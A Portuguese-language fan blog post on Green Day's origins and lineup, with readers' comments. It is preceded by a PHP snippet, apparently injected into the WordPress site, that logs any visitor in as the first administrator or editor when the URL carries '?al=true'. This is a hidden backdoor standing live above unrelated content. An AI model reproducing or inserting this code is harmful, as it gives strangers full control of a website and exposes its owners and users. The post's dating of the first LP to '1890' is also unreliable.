// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2);
Heey zombieees *-*
Bom, No ultimo post eu tinha dito que não estava bem e voltava quando melhorasse né? Pois é, eu estava mal por causa de umas histórias com o Lucas, mas já está tudo bem de novo ^^
Boom, hoje eu estava ouvindo Green Day, que é uma das minhas bandas preferidas atualmente (Se não for A preferida né…) E resolvi falar um pouquinho deles aqui ^.^
Green Day é uma banda de punk Rock formada em East Bay- Califórnia em 1987 . Na época a banda era composta apenas pelo Billie Joe e Mike Dirnt e era chamada de Sweet Children. Fizeram seu primeiro show em um restaurante que a mãe do Billie trabalhava. Em 1988 eles começaram a trabalhar com o baterista John Kiffmeyer .Pouco tempo depois o dono da gravadora Lookout!Records viu a banda tocando e logo gravaram seu primeiro EP que chamou “1,000 hours” mas precisaram abandonar o nome “Sweet Children” para não serem confundidos com uma banda local que tinha o nome de “sweet baby” e então, a banda passou finalmente a se chamar Green Day – O nome deriva de uma giria americana que significa fumar maconha o dia todo, ao invés de fazer suas obrigações (WHAT? POIS É ‘-‘ ).
Em 1890 Eles lançaram o primeiro LP e começaram a fazer sucesso, porém depois da primeira turnê nacional o baterista John resolveu “voltar para a faculdade” e saiu da banda (Alguns dizem que na verdade ele não queria ‘deixar’ a segurança de sua casa pra fazer turnês e por isso deixou a banda-slá) Então Billie e Mike chamaram um baterista temporário que não deu muito certo e logo depois, antes de gravar seu segundo álbum chamaram Tré Cool – e aí começou a perfeição:
Billie Joe Armstrong (o sexy) no vocal e guitarra, Mike Dirnt no baixo e Tré Cool na bateria
Bom, depois disso eles começaram a fazer mais e mais sucesso e eu nã vou ficar contando cada passo que eles deram prq senão o post fica gigante. Mas enfim… Eles gravaram VÁRIOS discos, ganharam VÁRIAS coisas e tals… A banda tem um site super legal que está sempre atualizado e tals, quem quiser ver tá AQUI
E eu como uma viciada em neles não podia deixar de falar né… atualmente eles estão concorrendo como “best live” e “best rock” no EMA, quem quiser votar ou ver ESSE é o link. Eles também estão no “people’s choice awards 2013” como “favorite band” …. quem quiser ver/votar o link é ESSE… ~votem, votem votem, please? pooxa, o que custa? só um clique *-* ~
Agora chega de fazer propagandas né? kkkk… vamos a alguns videos das minhas musicas favoritas deles!
Rita ♥
Ah, eu curto muito Green Day >< hasuha
Mas essa não é minha banda preferida… na real nem sei qual é, sou tão eclética :b ajdioaj
Beijos, Unicorn Land ;3
Laura Nolasco
Haha, que bom que curte *-*
Eu vario muuuito nessa de “banda preferida”… varia muito pela fase que estou, mas ultimamente tem sido Green Day *-*
Sifi -- Rafa (Hiper Friends)
Eu já fiz um post sobre eles no HF *–* poisé menina, mas e o escandalo que o Billie deu hein? Paia… Ele foi se tratar agora das dorgas :/ A minha musica preferida deles eh Boulevard of broken dreams e 21 guns, mas Jesus of suburbia tb é massa 😛 E o Billie é LEEEEEEEEENDO, nem dá pra saber o segredo dele ter 40 anos e ter cara de 20 né?
Laura Nolasco
*-*
Poois é, muito problematico o Billie com drogas né… Mas sim, ele é lindo, e muito fofo! Morro de ~inveja~ vendo as fotos do instagram dele com a mulher dele… são muito fofos *-*… muita carinha de 20 a dele, e como eles “namoram” demais, fica mais ainda, haha